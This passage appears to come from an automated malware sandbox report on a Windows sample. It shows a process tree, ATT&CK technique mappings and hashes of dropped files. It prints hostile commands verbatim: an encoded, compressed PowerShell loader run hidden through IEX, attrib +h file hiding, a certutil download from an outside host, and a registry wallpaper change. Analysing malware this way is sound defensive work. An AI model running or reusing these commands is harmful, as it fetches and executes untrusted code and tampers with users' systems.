4AVwBoAEwAaABIADQAQgBWAFEAbwB2AHEAegBNADgAYwBZAFYAcwBxAFMAcQAyAEEASAA4AEQAdQArAEEAMAAwAHYATgA1AEIAbQArAEMAeAA5AFMAcQAzAHMAdgBIAHYAKwBuAG4ATwBaAHMALwBVAG8AcQBsAEgAVABHAFAATABjAHIARgBFAHEAMQBtADIATQBhAGgAVAByAFIAdABaAHAAaQBZADIASgBWAHcAegBMAC8ANwBpAHIAeABEAGEAeABUAEQAMABpAFoAMwBOAFAAMQBRADgAZwBQAFcAMwBOAGUAUwA1AGsAVABHAHgAQwBkAEEARwBHAGgAZQBwAGoAMAA5AEwAdABIAEoAVQBhAE4AYgBBAFEANwBtAFcAcQB0AFQAMgA3AFUAUAA0AFEARQAwADYAMwBiAFUAZwA1AHMASgBSAEEAVABHAEEAbQB4ADAASQBsAE8AVwBkAEMAVgBQAHMAMwBQADYAcAAxAEYAUgBQAEoAOABXADMAcwBnAEgAUgBSAGgAUQBSAGIAMwAwAEwATgBPAFcAVgBVAFEAVABkADkAaQAxAEgANQBQADcAaAA5AHoAcABOAGoAVQB1AFIAWQBuAFUARgA2ADUAegBRAFEAUQBMAFUAOQBVAHEATQAwAEsAeQBSAFEAMQA4AHEAMQBYADQAagAzAHYANwBuADMAYwA0AG4ANQB5AFUAMAB1AHgASwBkAEEAVgBvAHAARQBmAE8AeABsAEoARQArAFgAUQB0AEwATQBMADUAZQB2AGIAMQBnAFcAeQBJAFUARQBVAEIATgBDAHoAKwBuAHAARQBXADYAMwAxAEsASwBNAFYAYwBwAE0ATgB3ADYAawBUAE4AbgBQADIAcQBIAEkASgA4AEkAZwBHAFAAQQBMACsAQwBmAHcAWgB3AEsAQgBsACsAWABoADMATwAvAE4AWgBaAE8AUABKADkATQBCAFAAZAB4AEkAcwAyADYALwBGAFIAOQBpAEsAVgA3ADAAYQBFAGEAZwBRAGUANAAxAEUAUABtAE4AbABFAHkAOABoADAAYgBzAHQAQgByAEkAbAA1AEkAeAB6AEUAVwBkAFkAQgBEADEAcABhAFQAUABEAHAAcQBCAEoANwBTADMAMQB0ADMASgB6AGwARgAvAFoAaAB3AGEAeAByADAAawBkAEEAeABSAGEAQQAyADAAUwBNAGoAbABCADEATABTAEUAdwBMAHUAegBvAFAAeABqAFoAUgB3ADMAaABEADAAdQBtADMAZgA3AFIAMQBRAEMALwBQAEQATgByADYAWAB6AFEATgBEAHUAbABqAGYAcAB0AGwASQB1ADEATABwAGgAcQBoAGwAWQAxAG4AagAvAGIASABxAEkAdABsAG8AegBJAFQAaAArAEwAWABKAGsANQBSAEcAZwB6AG0ATgArAEcAaQBOAHQASQBCAG4AcABzAGIASQBoADMATgBLAHoARgBaAHQAdQA4AE4ATQBWAFgAdQBaACsAVQBKAHUARgBFAHYAWgBtADQATwB4AGoARQBaAEIAOQB4AGEAOQBOAGoATgBoADMAQQBJAGMAVQBqAFYAVABkAGcAOQB0AGwASgByADMAdwBzAEcAOABIADgAdgBaADQARwBFAHMAZwB0ADAAZwBYAG0AMQBiAEEAMABWAGwAdwBMAGEASwAwAGcATgBhAFIAcABQAGgAZwBqAHcAdwBVADkAMQBwAFoAWgBuAGIANABxAFMAOQBsAE0AcQBtAFQANwBUADcAWQBUAHYAVQBNADgANgBYAEwAVwB6ADAATgBpAFQAWABIAGMAcgByADcAZgBDAE8ASgAwAGYALwBWAEgAVwBlAEkAYgBCAHQARAB4AGIAOQBFAGQAaAAyAE8AVQBXAEIAVwBPAGkAMwBBAGwANgBDAHoAQwBpAHkAdwBGAFkAMwBEAEMAVAB3AE0AVwB2AHYAVABXAFoAOABVAEYAYgBwAHoATgBDAHMAYQBUAE4ATAByAEsARABmAGIATgAvAGUAYQBMADUAKwB2ACsASgBrAFkAWgAxAHkANABVAFQAdQBjAEwATgBPAHgATwAyAHkAeQBKAEkAOQBqAGsAaQBIAGMARABEAGMATwBIAFoAbgB4AFUAMwBsAGQATwBIAFkAMwBaADQAVQBXAHEAcwBYADIAKwBtAHYAYgAxAC8AMgBLADkAegBYAGsAdwBZAGEATAA1AG0AbQBsAGkANwBEAEoAQgB3AGwAZABNAHYAZQB6AGcAeAB2ADQAawB2AE0AZQBqAGEAMwArAGMAbgBEAHkAMQB4AGMAYQBPAGEAYQBiAGQANABxAHEANgBVAC8AWABkAEMAUwBJAGgAegBvAEIAWABzAGcANwBJAEsALwBYAGMAeABzAE4ASgBvAHQANwAwAFMAUgBIAGMAZQBtADYARAB0AHMARwBvADMANQBkAE4AdABIAEUASQA4ADUAbgBTADYAWAA3AEoAZwBnAGMATABzAC8AbAB4ADUAWQBCAHMAMwBWAEYANQBUAGIASwAyAHkAQQB6AGcANAB4AHcAbwBIAGYAOABTAHQAaAB4ADIAdQBjADEAZgBLAGwAMQA1AGUAMgBaAE4AQwBRAEgAUwAwAHkANAAxAG8ASwBnADcAbQBHADkAaQBwAHIAMAA4ADYASwBOAG0ALwBDADQAVQBKADYATgBZAFkAeABjADYAZAB3AFYAbgBaAFAAYgA2AFUAWQBUADYANwBNADIAdwAxAC8AVwBQAFMARAB4AE4AVABaAEgAdQBQAFAARwBWAHMATwBBAHoAegBiADkAdQA0AEcAcQBDAFgARwBsAG8AZwBjAGUAVABWAHEAWgA2ADQAOABlAFIARgBhAG4AQwBKAHMAKwBuAHgAagBsAE0AdwBTAFQAUQB3AFEAaQArAFMAcgBTAE8AeQB1ADUAbQA3AFEANgBTAGoATABuAHQAMQAyAGwAYgB1AE8ANQAyAHUAagBYAGsAYgBIADMAaABxAE4AZQBnAGMAbAAzAHMANwBFAGoAZAAvAHQAYgBnAC8ASgByAG4ASABEACsAQQBzAEYARAAzAGYARwBnAEoANwBpAEIAcgBNAEkANwBtAFkAUAA1AHIAMABrAHQAZwBWAHAAdgAxAHIAMABHAG0AMgBhADQAQwBCAGkAdABHADEAOABrADEAcQBxAE0AbABxAHoAaQA5ADEAOABPAFoAbQBrADMARwBMAGQAYQBNAHEANwBoADEAawA0AEcAagBVAG0AQgA3AHYAUAAzAEsARABrAC8AawBIADAAVwBUAEcAOQA1AFIAZwBuAGQAbgBhAHgAWQBqAE4AdABmADAARABiAHQAQwB3AHAAUgBzACsANgBHAHIASgBwAG8AUABlAEUAMwBmAEIAbQAzAFQAYQB0AHMAVQB6AGYANgBqADAARQBQAEYAVgBYAFkAMQBsADYAQgBUADcAVAAwAFYANQBxAEsAbgB2AEUAawA4ADYATwA2AFkAdgBBAHcANABNAEQAZgBBAEUAZQBXAFYAZgB1ADgAQgBCAEUAdwBOAE4ATQA2AFUAdgBaAE8ATwBkAHEAUwB2AFMAdwBWADMAQwAxAHMAYgBFAEQAYgBtAGEAMQBSAHMAWgBlAGkAOQBhAGQAbABoAEsAUABHAFAASgBxADgAagB0AHYARAByAEgAUwB4AEEATwB0AHcAbgBNAGgAWgBFAG8AcQBNAEoAcQBSAFYANgBPAE4ARgAwAEoALwBrAGUAWgAzADkAaAA4AFUAUABLADkAdABRAHIAMwBWAEcANgBnAHkAVQBNAEQAeQArAGEAdQByAGEAbgA3AHYAdgA2ADAAOABYAHEAWgBQADUAegA3AHQANwBmADMAYQBTAE0ARQBhAGMANQB2AFgAcgBtAEkAbAAwAGQAOQBWAHIATQArAGEASAAwAFUAUABvADUAMQB1AFEAeQBXAEQAQgB1AFoAOAAvAFEAaABlAEsASgB6AGEAawBLAGwAbgA1AFIAcQBWAHkAcwBlAGQAOAB3AHMATwBYAFcAeABEAFYAdwBsADkANQA3AGwAbwBzADcAYgB0AG0AWABuAGoAOQBFAGsASABBADIAMwBjAHMAYgBsADYAZwBzAHQAcABDAFUATwBtACsAZQBHAG8AUwByADAASgBRAHIAZAAwAFAASgBNAFIAYgB6AFoARgBjADMARQA2ADQAYgBuAEgATwBnAHQAKwArAGIASwBHADQAOQBYAGUAZwBTAGgAagBkADAAdAAyAE4AWQBwAE8ARwBaAHEAbQA4ADIAZQBMAHIAcABaACsASAB4AGIATwA4ADcAUABLAG0ANwBsAGEAMwBsAHkAOQA4ACsAVAA5AFQAbgBhAHgAVQAvAFcARQBmAGgAaQA3AEQAdgA0AC8AQgB1AEMAbgBUAGYAOAA3AHQARABsADQAUgBYAC8AMgBCAGwAMwBoADAATQBkADQAVgBVAHYAbABiADYAVwBTAHQASwBIAGUAegBVAGYAVwBLADMAeAA5ADQASQBEAHEARgB0AHkATABnAE8AYgBrAGUAdQA4AFoAOABLAGwAUwAzAEwAMgBWAFMANwAxAEsAUwBmAHcAOQBkAGEAbABUAFAANgBoAHIATwBCADQAYgBNAFUAMwA0AFgAZwBtADMAYwBYADQAUgBVADgAZgBQAHIAKwAvAFUAUQBiAGUATwBpAHQAKwBwAE8AVABZAHgAdABNAC8AWABRADgAOABBAGwAbQBMAG8AcAAzAEwAVABoAFoARgBjAEcATwBiACsAQgByADAAbQB5AHgAegBQAEQAUQBBAEEAIgApACkAOwBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAkAHMALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA=
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1732
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h winbata.bat
  2⤵
  PID:868
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h winbata.bat
    3⤵
    - Views/modifies file attributes
    PID:1160
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c start winbata.bat
  2⤵
  PID:2040
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K winbata.bat
    3⤵
    PID:808
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABiAFgATwBpAHkAaABMACsASABIADgARgBIADEASwBsAFYAbwB4AEIATQBXAHIAMgAxAEYAWQB0AEkAaQBBAEsAdgBxAEcAWQBtAEoATgBLAEEAVABNAHEAaABuAGMARwBoAEoAegBkAC8AMwA0AGEAMQBKAHoAcwAyAGUAVABlAHIAYgByAFgASwBvAHQAaABwAHIAdQBuADUAKwBtAG4AZQB4AG8AVgBrADIAdQBWAGgASgBaAEoARgBBADkAaAA2AGwAcgBEAFkAVwBSADUATAB0AFUAcwBsAFMANwA3AG4AawBTAG8AcgA5AFMAMwBjAG0AawBUAHUAeQBiAEoAcAAvAFAAQgA4AHgAYQBUAFoAegAvADAAegBHAGMAZABvAFIAQgBIAEUAZgBWAFgANgBXAEsAcQBoADcAcABEAFYAUwA0AFQAUABYAHgAMgBQAEIAVABiAHUARQBZAFYATAA3AGsAZwBSAG4ARwBJAHEAeABjAFgAcABZAHQAaQBLAG4AWQBqAGYAWQBPAGYAWABaADEAWQBDAFgANQAyAE0ATgBsADUASwBJAEsATgBLAG8AKwBzADcALwBjADkAUgA3AGYAYwBwAHkAOQBmAHUARABnAE0AcwBVAHUATwA3ADMAVQBSAEUAegBhAEsAcwBHAFAAWQBGAG8ANABxAFYAZQBvADcAdABkAHIAaABFAEYAOQBQAGoARAAwADIAQwBmAFUAWABkAGYAbABjAEYAMgAzAFAAMABPADIAVABXAE0AYgBwADUAZwA0AE8AeABMAG8AbwBYADUATQA5AFUAOAA5AFAAVQBGAGQAOQAyAHkASwBWADgAcAA5AC8AbABxAHUAUAAxADQAMgBuAE8AaAAvAEUAdQBoADEAVgB5AG0AbwBXAEUAZQB6AFUAawBXADIAWABxADkAUwBQAGEAcgA3AGgASQB2AE4AeABwAGEAeABZAFoAdQBoAEYAMwBvAGIAVQBWADUAYgBMAE4ATwB2AEwAdwB2AHQAeAA0AGIAeAB5ADkATAAxAGMAUABaADEAcwA2ACsAdAB3AGoAcwA4AFAAbQBWAHMAOQA2AGwAVABLAE0ASgB3AEMATgB1AHcAUgB3ADMASwBOAGUAcwB6ADMAZQAzAHgANgBvAHIANgA5AGUAVABPAFAAWABXAEkANQB1AEMANgA1AEIASQBlAGUAcgArAEkAdwBzAFUAdwBjADEAUQBlADYAaQAyAHcAOAB4AHgAdABRAEsAMABjAFEAUABuAGQAYgByAG8ASQBUAEkAUwBaAHgANgBGAEoAbgBYADAAQQB2ADgAVgA1AHcANQBkAEsATgBiAGIAcwBHAGQAaAA5AC8AMQArADUAVABaAFkAdwBQAFoAMwBCAC8AVgA2AG4AeQBYAGcAbQBrAHAAaQBTAHMAMQBrADYAYwArAEIAMAA0AGwASQBJADMAUgAzAE4AdwBuAEYAKwA4AGYAMABlAHUASwB2AHgAKwBJAFYAaQAxADkASwBQADAAQQBWAFUAUgB0AHYARgBXAEoALwBpAFoAQQBMADcAdgB1AEYAcQA2AHUASABnAHMAaABoAGoATwBVADUAbAA2AGsAVgBYAG8AZgBhAFgAbwBHAHEAVwBBAEUAegByAHgAdwBpAHcAUAA1AHkASwBNAGMAZgBYAHAAbgAvAGcAYwB0AHoAMQByAFIAcgBWAFAARABUAFgATwBXAGkAZQBkAFkAMwBpAE8AZgBuAHkAbABIAGoAWABQAFEAawArAGwAaQAyAHIAcAB4AEoANQA4AC8AdABtAEkATABSAHYAaABNAEYALwAvAFAAQgB2ADYAZQBHAE8ANQB1AEoAKwA1AHUAbQBPAFoAWgA4AEoAWABQAG8AbwBaADMAdABpADQAdwBLAE4AKwBGAGgAdQBEAG4ANQBYAHkAYQBRAEcAagAvAGcAbQBkAGMAZwA3AG8ANAA2ADkAcQB2AEcATwBSAE4AOQAzAGUAMABUAG4AVwBoAEwAaABIADQAQgBWAFEAbwB2AHEAegBNADgAYwBZAFYAcwBxAFMAcQAyAEEASAA4AEQAdQArAEEAMAAwAHYATgA1AEIAbQArAEMAeAA5AFMAcQAzAHMAdgBIAHYAKwBuAG4ATwBaAHMALwBVAG8AcQBsAEgAVABHAFAATABjAHIARgBFAHEAMQBtADIATQBhAGgAVAByAFIAdABaAHAAaQBZADIASgBWAHcAegBMAC8ANwBpAHIAeABEAGEAeABUAEQAMABpAFoAMwBOAFAAMQBRADgAZwBQAFcAMwBOAGUAUwA1AGsAVABHAHgAQwBkAEEARwBHAGgAZQBwAGoAMAA5AEwAdABIAEoAVQBhAE4AYgBBAFEANwBtAFcAcQB0AFQAMgA3AFUAUAA0AFEARQAwADYAMwBiAFUAZwA1AHMASgBSAEEAVABHAEEAbQB4ADAASQBsAE8AVwBkAEMAVgBQAHMAMwBQADYAcAAxAEYAUgBQAEoAOABXADMAcwBnAEgAUgBSAGgAUQBSAGIAMwAwAEwATgBPAFcAVgBVAFEAVABkADkAaQAxAEgANQBQADcAaAA5AHoAcABOAGoAVQB1AFIAWQBuAFUARgA2ADUAegBRAFEAUQBMAFUAOQBVAHEATQAwAEsAeQBSAFEAMQA4AHEAMQBYADQAagAzAHYANwBuADMAYwA0AG4ANQB5AFUAMAB1AHgASwBkAEEAVgBvAHAARQBmAE8AeABsAEoARQArAFgAUQB0AEwATQBMADUAZQB2AGIAMQBnAFcAeQBJAFUARQBVAEIATgBDAHoAKwBuAHAARQBXADYAMwAxAEsASwBNAFYAYwBwAE0ATgB3ADYAawBUAE4AbgBQADIAcQBIAEkASgA4AEkAZwBHAFAAQQBMACsAQwBmAHcAWgB3AEsAQgBsACsAWABoADMATwAvAE4AWgBaAE8AUABKADkATQBCAFAAZAB4AEkAcwAyADYALwBGAFIAOQBpAEsAVgA3ADAAYQBFAGEAZwBRAGUANAAxAEUAUABtAE4AbABFAHkAOABoADAAYgBzAHQAQgByAEkAbAA1AEkAeAB6AEUAVwBkAFkAQgBEADEAcABhAFQAUABEAHAAcQBCAEoANwBTADMAMQB0ADMASgB6AGwARgAvAFoAaAB3AGEAeAByADAAawBkAEEAeABSAGEAQQAyADAAUwBNAGoAbABCADEATABTAEUAdwBMAHUAegBvAFAAeABqAFoAUgB3ADMAaABEADAAdQBtADMAZgA3AFIAMQBRAEMALwBQAEQATgByADYAWAB6AFEATgBEAHUAbABqAGYAcAB0AGwASQB1ADEATABwAGgAcQBoAGwAWQAxAG4AagAvAGIASABxAEkAdABsAG8AegBJAFQAaAArAEwAWABKAGsANQBSAEcAZwB6AG0ATgArAEcAaQBOAHQASQBCAG4AcABzAGIASQBoADMATgBLAHoARgBaAHQAdQA4AE4ATQBWAFgAdQBaACsAVQBKAHUARgBFAHYAWgBtADQATwB4AGoARQBaAEIAOQB4AGEAOQBOAGoATgBoADMAQQBJAGMAVQBqAFYAVABkAGcAOQB0AGwASgByADMAdwBzAEcAOABIADgAdgBaADQARwBFAHMAZwB0ADAAZwBYAG0AMQBiAEEAMABWAGwAdwBMAGEASwAwAGcATgBhAFIAcABQAGgAZwBqAHcAdwBVADkAMQBwAFoAWgBuAGIANABxAFMAOQBsAE0AcQBtAFQANwBUADcAWQBUAHYAVQBNADgANgBYAEwAVwB6ADAATgBpAFQAWABIAGMAcgByADcAZgBDAE8ASgAwAGYALwBWAEgAVwBlAEkAYgBCAHQARAB4AGIAOQBFAGQAaAAyAE8AVQBXAEIAVwBPAGkAMwBBAGwANgBDAHoAQwBpAHkAdwBGAFkAMwBEAEMAVAB3AE0AVwB2AHYAVABXAFoAOABVAEYAYgBwAHoATgBDAHMAYQBUAE4ATAByAEsARABmAGIATgAvAGUAYQBMADUAKwB2ACsASgBrAFkAWgAxAHkANABVAFQAdQBjAEwATgBPAHgATwAyAHkAeQBKAEkAOQBqAGsAaQBIAGMARABEAGMATwBIAFoAbgB4AFUAMwBsAGQATwBIAFkAMwBaADQAVQBXAHEAcwBYADIAKwBtAHYAYgAxAC8AMgBLADkAegBYAGsAdwBZAGEATAA1AG0AbQBsAGkANwBEAEoAQgB3AGwAZABNAHYAZQB6AGcAeAB2ADQAawB2AE0AZQBqAGEAMwArAGMAbgBEAHkAMQB4AGMAYQBPAGEAYQBiAGQANABxAHEANgBVAC8AWABkAEMAUwBJAGgAegBvAEIAWABzAGcANwBJAEsALwBYAGMAeABzAE4ASgBvAHQANwAwAFMAUgBIAGMAZQBtADYARAB0AHMARwBvADMANQBkAE4AdABIAEUASQA4ADUAbgBTADYAWAA3AEoAZwBnAGMATABzAC8AbAB4ADUAWQBCAHMAMwBWAEYANQBUAGIASwAyAHkAQQB6AGcANAB4AHcAbwBIAGYAOABTAHQAaAB4ADIAdQBjADEAZgBLAGwAMQA1AGUAMgBaAE4AQwBRAEgAUwAwAHkANAAxAG8ASwBnADcAbQBHADkAaQBwAHIAMAA4ADYASwBOAG0ALwBDADQAVQBKADYATgBZAFkAeABjADYAZAB3AFYAbgBaAFAAYgA2AFUAWQBUADYANwBNADIAdwAxAC8AVwBQAFMARAB4AE4AVABaAEgAdQBQAFAARwBWAHMATwBBAHoAegBiADkAdQA0AEcAcQBDAFgARwBsAG8AZwBjAGUAVABWAHEAWgA2ADQAOABlAFIARgBhAG4AQwBKAHMAKwBuAHgAagBsAE0AdwBTAFQAUQB3AFEAaQArAFMAcgBTAE8AeQB1ADUAbQA3AFEANgBTAGoATABuAHQAMQAyAGwAYgB1AE8ANQAyAHUAagBYAGsAYgBIADMAaABxAE4AZQBnAGMAbAAzAHMANwBFAGoAZAAvAHQAYgBnAC8ASgByAG4ASABEACsAQQBzAEYARAAzAGYARwBnAEoANwBpAEIAcgBNAEkANwBtAFkAUAA1AHIAMABrAHQAZwBWAHAAdgAxAHIAMABHAG0AMgBhADQAQwBCAGkAdABHADEAOABrADEAcQBxAE0AbABxAHoAaQA5ADEAOABPAFoAbQBrADMARwBMAGQAYQBNAHEANwBoADEAawA0AEcAagBVAG0AQgA3AHYAUAAzAEsARABrAC8AawBIADAAVwBUAEcAOQA1AFIAZwBuAGQAbgBhAHgAWQBqAE4AdABmADAARABiAHQAQwB3AHAAUgBzACsANgBHAHIASgBwAG8AUABlAEUAMwBmAEIAbQAzAFQAYQB0AHMAVQB6AGYANgBqADAARQBQAEYAVgBYAFkAMQBsADYAQgBUADcAVAAwAFYANQBxAEsAbgB2AEUAawA4ADYATwA2AFkAdgBBAHcANABNAEQAZgBBAEUAZQBXAFYAZgB1ADgAQgBCAEUAdwBOAE4ATQA2AFUAdgBaAE8ATwBkAHEAUwB2AFMAdwBWADMAQwAxAHMAYgBFAEQAYgBtAGEAMQBSAHMAWgBlAGkAOQBhAGQAbABoAEsAUABHAFAASgBxADgAagB0AHYARAByAEgAUwB4AEEATwB0AHcAbgBNAGgAWgBFAG8AcQBNAEoAcQBSAFYANgBPAE4ARgAwAEoALwBrAGUAWgAzADkAaAA4AFUAUABLADkAdABRAHIAMwBWAEcANgBnAHkAVQBNAEQAeQArAGEAdQByAGEAbgA3AHYAdgA2ADAAOABYAHEAWgBQADUAegA3AHQANwBmADMAYQBTAE0ARQBhAGMANQB2AFgAcgBtAEkAbAAwAGQAOQBWAHIATQArAGEASAAwAFUAUABvADUAMQB1AFEAeQBXAEQAQgB1AFoAOAAvAFEAaABlAEsASgB6AGEAawBLAGwAbgA1AFIAcQBWAHkAcwBlAGQAOAB3AHMATwBYAFcAeABEAFYAdwBsADkANQA3AGwAbwBzADcAYgB0AG0AWABuAGoAOQBFAGsASABBADIAMwBjAHMAYgBsADYAZwBzAHQAcABDAFUATwBtACsAZQBHAG8AUwByADAASgBRAHIAZAAwAFAASgBNAFIAYgB6AFoARgBjADMARQA2ADQAYgBuAEgATwBnAHQAKwArAGIASwBHADQAOQBYAGUAZwBTAGgAagBkADAAdAAyAE4AWQBwAE8ARwBaAHEAbQA4ADIAZQBMAHIAcABaACsASAB4AGIATwA4ADcAUABLAG0ANwBsAGEAMwBsAHkAOQA4ACsAVAA5AFQAbgBhAHgAVQAvAFcARQBmAGgAaQA3AEQAdgA0AC8AQgB1AEMAbgBUAGYAOAA3AHQARABsADQAUgBYAC8AMgBCAGwAMwBoADAATQBkADQAVgBVAHYAbABiADYAVwBTAHQASwBIAGUAegBVAGYAVwBLADMAeAA5ADQASQBEAHEARgB0AHkATABnAE8AYgBrAGUAdQA4AFoAOABLAGwAUwAzAEwAMgBWAFMANwAxAEsAUwBmAHcAOQBkAGEAbABUAFAANgBoAHIATwBCADQAYgBNAFUAMwA0AFgAZwBtADMAYwBYADQAUgBVADgAZgBQAHIAKwAvAFUAUQBiAGUATwBpAHQAKwBwAE8AVABZAHgAdABNAC8AWABRADgAOABBAGwAbQBMAG8AcAAzAEwAVABoAFoARgBjAEcATwBiACsAQgByADAAbQB5AHgAegBQAEQAUQBBAEEAIgApACkAOwBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAkAHMALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1696
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h update.exe
  2⤵
  PID:1592
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h update.exe
    3⤵
    - Views/modifies file attributes
    PID:1384
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c start update.exe
  2⤵
  - Loads dropped DLL
  PID:1508
- - C:\Users\Admin\AppData\Local\Temp\update.exe
    update.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1644
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c dir
      4⤵
      PID:1532
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h windata.bat
  2⤵
  PID:1804
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h windata.bat
    3⤵
    - Views/modifies file attributes
    PID:1876
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c start windata.bat
  2⤵
  PID:1480
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K windata.bat
    3⤵
    PID:1296
  - - C:\Windows\SysWOW64\certutil.exe
      certutil -urlcache -split -f http://art-cure.com/upload/image.jpg
      4⤵
      PID:1420
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h win32.bat
  2⤵
  PID:608
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h win32.bat
    3⤵
    - Views/modifies file attributes
    PID:1472
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c start win32.bat
  2⤵
  PID:1520
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K win32.bat
    3⤵
    PID:1672
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\Pictures\desktop.jpg /f
      4⤵
      Sets desktop wallpaper using registry
      PID:1100
  - - C:\Windows\SysWOW64\rundll32.exe
      RUNDLL32.EXE user32.dll ,UpdatePerUserSystemParameters
      4⤵
      PID:1548
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h windata.bat
  2⤵
  PID:1680
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h windata.bat
    3⤵
    - Views/modifies file attributes
    PID:1272
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c start windata.bat
  2⤵
  PID:1084
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K windata.bat
    3⤵
    PID:832
  - - C:\Windows\SysWOW64\certutil.exe
      certutil -urlcache -split -f http://art-cure.com/upload/image.jpg
      4⤵
      PID:428
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h win32.bat
  2⤵
  PID:536
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h win32.bat
    3⤵
    - Views/modifies file attributes
    PID:1804
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c start win32.bat
  2⤵
  PID:1648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K win32.bat
    3⤵
    PID:596
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\Pictures\desktop.jpg /f
      4⤵
      Sets desktop wallpaper using registry
      PID:1724
  - - C:\Windows\SysWOW64\rundll32.exe
      RUNDLL32.EXE user32.dll ,UpdatePerUserSystemParameters
      4⤵
      PID:1400

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F60F3B8ADC68AB66ED9F0FB14DD3868B

Filesize
12KB

MD5
0ad0c474db8f24a7c58d7b76e3b08e2e

SHA1
324271930e8c8c6d970fea0d8cc5f888ff3b4d5d

SHA256
5684a132344756d1d5feac935fd898c5a451e1895680c86510ea40bd5fa4b331

SHA512
920a54787d5d568ba75c349caae3f7a80739ee8c85675f2f732f763abbb4bc659fb8fe764e84687b9f892b23a473eb96375a6b3a92d8987ca48d75313160fba4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F60F3B8ADC68AB66ED9F0FB14DD3868B

Filesize
12KB

MD5
0ad0c474db8f24a7c58d7b76e3b08e2e

SHA1
324271930e8c8c6d970fea0d8cc5f888ff3b4d5d

SHA256
5684a132344756d1d5feac935fd898c5a451e1895680c86510ea40bd5fa4b331

SHA512
920a54787d5d568ba75c349caae3f7a80739ee8c85675f2f732f763abbb4bc659fb8fe764e84687b9f892b23a473eb96375a6b3a92d8987ca48d75313160fba4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F60F3B8ADC68AB66ED9F0FB14DD3868B

Filesize
232B

MD5
98a6c7691dff36d8b3cdf3848352dab6

SHA1
93a5ca3962242efca262bd3a4eed19bf3f17927c

SHA256
36aca01eddebfd06abf963567495585272554046647dc94da33a4b801db273d5

SHA512
b8654fcc5cddeb31abed1d5e1708760da69972f039e4137812f02eda5849cbb8812c8bed5e9a6ce3426f22eb96e4b4f46e535c245c0d88bdab023a237f362306

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F60F3B8ADC68AB66ED9F0FB14DD3868B

